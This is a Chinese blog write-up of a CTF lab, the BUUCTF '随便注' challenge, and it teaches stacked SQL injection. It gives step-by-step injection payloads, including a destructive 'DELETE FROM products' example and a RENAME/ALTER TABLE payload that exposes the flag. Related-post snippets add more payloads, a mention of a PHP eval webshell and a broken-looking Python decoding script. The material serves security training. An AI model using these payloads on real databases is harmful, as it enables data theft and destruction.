BUUCTF-Web-随便注-wp

最新推荐文章于 2025-05-13 14:24:35 发布
最新推荐文章于 2025-05-13 14:24:35 发布
阅读量465 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/single7_/article/details/111151723
本文详细介绍了SQL堆叠注入的概念、与联合注入的区别,并通过一个具体的CTF题目案例,演示了如何判断注入类型、查询字段数、显示字段、查询表内字段以及最终获取flag的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 知识点

SQL注入-堆叠注入
sql预处理语句
巧用contact()函数绕过

0x02 知识铺垫

在SQL中,分号(;)是用来表示一条sql语句的结束。在分号(;)结束一个sql语句后继续构造下一条语句,而后根据结果判断两条甚至多条SQL语句会不会一起执行?这种注入方式称为堆叠注入。

union injection(联合注入)是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。

用户输入:1; DELETE FROM products
服务器端生成的 sql 语句为:(因未对输入的参数进行过滤)Select * from products where productid=1;DELETE FROM products
当执行查询后,第一条显示查询信息,第二条则将整个表进行删除

0x03 重命名+堆叠注入

打开题目,显示如下界面,根据题目以及界面,判断属于 SQL 注入类问题
在这里插入图片描述

0x04 判断是否存在注入,注入是字符型还是数字型

输入1’发现不回显
输入1’ #显示正常
从而判断存在 SQL 注入
输入1’ or ‘1’='1,正常回显,判断注入类型为字符型注入
在这里插入图片描述

0x05 猜解SQL查询语句中的字段数

输入1’ order by 1 # 成功回显在这里插入图片描述
输入1’ order by 2 # 成功回显在这里插入图片描述
输入1’ order by 3 # 回显错误
[图片上传失败…(image-2ea278-1567002658869)]
所以只有两个字段

0x06 显示字段

输入1′ union select 1,2 # 回显一个正则过滤规则
在这里插入图片描述
这也就意味这页面对 select,update,delete,drop,insert,where 和 . 进行了过滤,根据经验判断是否存在堆叠注入

0x07 堆叠注入测试

输入1’;show databases;#
在这里插入图片描述
根据返回结果可以判断出存在堆叠注入

0x08 查询表

输入1’;show tables;# 成功回显
在这里插入图片描述

0x09 查询表内字段

0x09a 知识铺垫

linux下不区分,windows下区分
区别:
单引号( ’ )或双引号主要用于字符串的引用符号
eg:mysql> SELECT ‘hello’, “hello” ;

反勾号( ` ) 主要用于数据库、表、索引、列和别名用的引用符是[Esc下面的键]
eg:`mysql>SELECT * FROM `table` WHERE `from` = ‘abc’ ;

输入1’; show columns from `words`; # 字段使用的是反勾号( ` )
在这里插入图片描述

输入1’; show columns from `1919810931114514`; # 字段使用的是反勾号( ` )
在这里插入图片描述
查找到 flag 的字段 ,两张表分别是 word 和 1919810931114514,回显内容肯定是从word这张表中回显的,因此需要一种方式让它回显 flag 所在的表。

根据先前获得的信息判断可以使用 alert 和 rename,那么可以尝试、把表进行改名,再给列改个名字。
先把 words 改名为 words1,再把这个数字表改名为 words,然后把新的 words 里的 flag 列改为 id (避免一开始无法查询)。

构造注入语句:

1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;
ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE
utf8_general_ci NOT NULL;show columns from words;#

在这里插入图片描述

0x10 get flag

输入1’ or ‘1’='1 ,查询就得到 flag
在这里插入图片描述
flag{ebdc096a-e76e-4a76-8c3f-32d8b375e85d}

buuctf-web-[强网杯 2019]随便-wp
居上
06-22 1545
[强网杯 2019]随便 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2609
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
BUUCTF WEB 随便
guishengyx的博客
10-18 241
题目是入,于是尝试SQL入 order by 2得到两个字段 尝试联合查询时发现禁用了select 百度了解到堆叠查询 用;将语句隔开 发现可以使用堆叠入 继续查询表名 查询表中的字段名 0';show columns from words;-- qwe 查询1919810931114514表的时候出现了问题 百度了解到数字表名需要用反引号``括起来 0';show columns from `1919810931114514`;-- asd ...
burpsuite+DVWA实现web暴力破解
最新发布
Wusiyiiii541的博客
05-13 1533
本文详细介绍了burpsuite+DVWA实现web暴力破解的过程
BUUCTF web随便
渗透之路,攻防之间皆学问
11-21 2609
启动靶场访问如下,输入1',报错,可知是字符型入,变量由单引号包裹输入1' and 1=1 --+,显示正常先直接用sqlmap入一下,显示存在入,但是始终入不出来数据库,“[ERROR] unable to retrieve the number of databases”,猜想应该是存在字符过滤因为现在还不知道是什么原因导致的sqlmap入不出来,所以先尝试手。输入框中输入1和2显示的结果不同,像这种直接回显输入的最先尝试联合入。
BUUCTF-web-随便
nareku的博客
07-06 1437
输入1试试,可以看到是GET传参 判断一下是数字型入还是字符型入 可以看出来是字符型入了,接下来就是常规猜解SQL查询语句中的字段数输入 : 1' order by 1# 输入: 1' order by 2#输入: 1' order by 3# 说明字段数为2 常规使用联合查询输入: 1' union select 1,2# 发现一些常用的查询关键词都被过滤了捏,但是堆叠查询入貌似没有,试试堆叠查询入输入: 1' ; show databases;#说明堆叠查询入可行输入: -1' ;
BUUCTFWEB】题:随便
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
11-12 578
可以发现,1919810931114514表中有个名为 flag 的字段,很可能该字段的值就是真正的 flag;:预编译相当于定一个语句相同,参数不同的Mysql模板,我们可以通过预编译的方式,绕过特定的字符过滤。进去之后,发现就一个输入框,测试一下是否存在 SQL 入,输入万能语句:1' or 1 = 1#将 select 转换成对应的 ASCII 码,从而绕过对 select 的过滤。发现表都爆出来了,说明存在 SQL 入漏洞,进一步测试一些其他语句是否可行。举例:查询 id = 1 的用户。
BUUCTF-WEB
ccfly1012的博客
11-02 4147
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
buuctf-web-[ACTF2020 新生赛]Upload 1-wp
居上
11-11 3769
[ACTF2020 新生赛]Upload 1 来到主页发现是一个文件上传的题目。 先随便上传一个文件试一试。 我上传了一个.php结尾的PHP一句话木马,可以看到被过滤了。审查一下元素。 可以发现前端有一个事件,直接删除该事件。再上传一遍试一试。 发现还是不能传上去,后端肯定也做了过滤。我们可以创建一个test.phtml文件。 对.phtml文件的解释: 是一个嵌入了PHP脚本的html页面。 将以下代码写入该文件中。 <script language='php'>@eval($_POST[
BUUCTF-练习场-Web(5-8)
m0_62905745的博客
10-26 1699
SQL入的解题大概步骤,以及爆表爆库查字段 绕过空格,替换字符的方法 命令执行漏洞
buuctf web 随便
qq_41696858的博客
08-08 504
这题入点很好找,跟之前easy sql一样 先1’直接回显,找到入点 于是常用思路1’ union select 1,2# 把过滤字符都返回出来了 return preg_match("/select|update|delete|drop|insert|where|./i",$inject); 下面就是sql(mysql)知识时间 show语句没有过滤,所以可以开始 -1';show databases; -1';show tables; -1';show columns from `191981093
BUUCTFweb之强网杯2019随便
12-14
开始入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTFWeb随便(SQL入)
qq_70434663的博客
03-02 691
但是因为表过滤了select,所以使用rename先把words表改为其它的表名,在把1919810931114514表改为words表,给新的words表添加新的列名id,最后将flag改名为data。猜测是SQL入,我们随便输入1'(单引号为英文状态下输入)发现报错提示表明此为单引号的SQL入。第一步,测试入点(利用引号,and 1=1 ,or 1=1之类的判断是字符型还是数字型)我们发现在1919810931114514表里面爆出了flag字段,猜测flag就在里面。接下来,爆出两张表的内容。
Buuctf-Web-[强网杯 2019]随便
御七彩虹猫
05-13 310
Buuctf-Web-[强网杯 2019]随便
BUUCTF web 随便
H4ppyD0g的博客
09-19 795
堆叠入 在SQL中,分号是用来表示一条sql语句的结束。如果在 ; 结束一个sql语句后继续构造下一条语句,效果就是分别执行两条sql语句。由于两条语句堆叠在同一行,而不是原本应该各自占据一行,所以这种入成为堆叠入。 意1 当数字型字符作为字段、表、库名查询时,应该用反单引号括起来 输入 1 没有报错 1' 报错,证明存在入 1' # 没有报错 1' orde...
BUUCTF Web [强网杯 2019]随便
热门推荐
wangyuxiang946的博客
10-25 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [强网杯 2019]随便一、题目简介二、思路分析1)判断入点2)选择入方式3)查看表中内容三、解题步骤1)获取表2)获取字段3)获取表中数据四、总结 一、题目简介 进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。 在输入框中输入一个2,即可.
【Writeup】BUUCTF_Web_随便
BAKUMANSEC - Just Do It
08-14 4578
【Writeup】BUUCTF_Web_随便 0x01 解题思路 打开页面,显然考点是SQL入: 手工测试一下: ​ ​ ?inject=' ​ ​ ?inject=' or 1# ​ ​ ?inject=' or 0# 可以进行基于布尔的盲释里有这么一句话: 先用sqlmap常规扫描试试: sqlmap identified the following in...
BUUCTF-Web-随便(堆叠入)
m0_46315342的博客
08-12 436
这里转载一个大佬的博客: 作者:简简的我 链接:https://www.jianshu.com/p/36f0772f5ce8 来源:简书 然后我简单说一下这个题目吧,这是个sql入的题目,过滤了select这样的关键字,双写和大小写以及空格都不能进行绕过,所以这里使用的是堆叠入。 这个作者讲了三种方法,但是第三种好像有点难,第一种和第二种是比较容易接受的。主要是学习一下堆叠入的语法吧,和sql有点点不一样。然后第二种方法里面作者还讲了一下预处理语句,感觉很牛逼。 ...
BUUCTF web wp
vegetable223的博客
11-28 468
BUUCTF-web warmup wp 首先认真阅读题目,一般题目信息有提示,有些还会有隐藏信息 题目名是“warm up”,热身?,看来没什么用。下面有提示我们这一题的主要知识点是php和代码审计,淦!发现都没学过,不过不要紧,不会我们可以百度啊!!! 打开链接 看到一张滑稽的表情,肯定不简单,直接f12查看源代码 下面展示一些 内联代码片。 <!DOCTYPE html> <html lang="en"> <head> <meta charset=
buuctf-snake
03-19
### BUUCTF Snake 题目分析 在BUUCTF的misc类别中,涉及snake主题的题目通常会结合密码学基础、隐写术以及一些常见的编码技巧。以下是基于已知引用内容和专业知识对该类题目的解答方法。 #### 1. 密钥推导 根据已有信息,“anaconda”被提及作为某个cipher的密钥[^1]。这表明,在解决此类问题时,需要关歌曲名称或其他线索中的关键词是否可以转化为加密算法所需的密钥。例如,如果题目提供了音频文件或者提示了某种动物(如蛇),则应尝试将其映射到可能的字符串形式,并测试其作用于常见加密技术的效果。 #### 2. 工具应用 对于涉及到图像或压缩包隐藏信息的情况,《BUUCTF misc 解题记录》提到使用`outguess`工具较少见但有效[^2]。此软件主要用于提取嵌入图片内的秘密消息;因此当面对`.jpg`, `.png`等形式的数据载体时可考虑运用该程序来查找潜在payloads。 #### 3. Python脚本实现逆向操作 从另一篇wp文档得知存在一段python代码用于计算flag值[^3]: ```python import binascii m = [0x410A4335494A0942, 0x0B0EF2F50BE619F0, 0x4F0A3A064A35282B] enc = "********CENSORED********" flag = b"" for i in range(3): p = enc[i*8:(i+1)*8] # 取每组8字节长度的部分 a = binascii.b2a_hex(p[::-1].encode('utf-8')) # 转换为十六进制表示后再反转顺序 temp_sum = int(a, base=16) + m[i] # 加上对应的偏移量M_i result_bytes = hex(temp_sum)[2:].rjust(len(a), '0').decode('hex')[::-1] # 处理最终结果恢复原始排列方向 flag += result_bytes print(flag.decode()) ``` 上述代码片段展示了如何通过给定参数列表`m[]`逐步还原出完整的FLAG串。它先按固定步长分割待解码序列,再逐一对各部分执行特定变换运算直至获得明文输出。 #### 4. 特殊字符处理 最后值得意的是某些情况下特殊符号也可能成为干扰因素之一。“Nss shop”的例子说明即使看似简单的括号位置差异都可能导致完全不同的解析路径[^4]。所以在实际动手之前务必仔细阅读全部描述以免遗漏重要细节。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值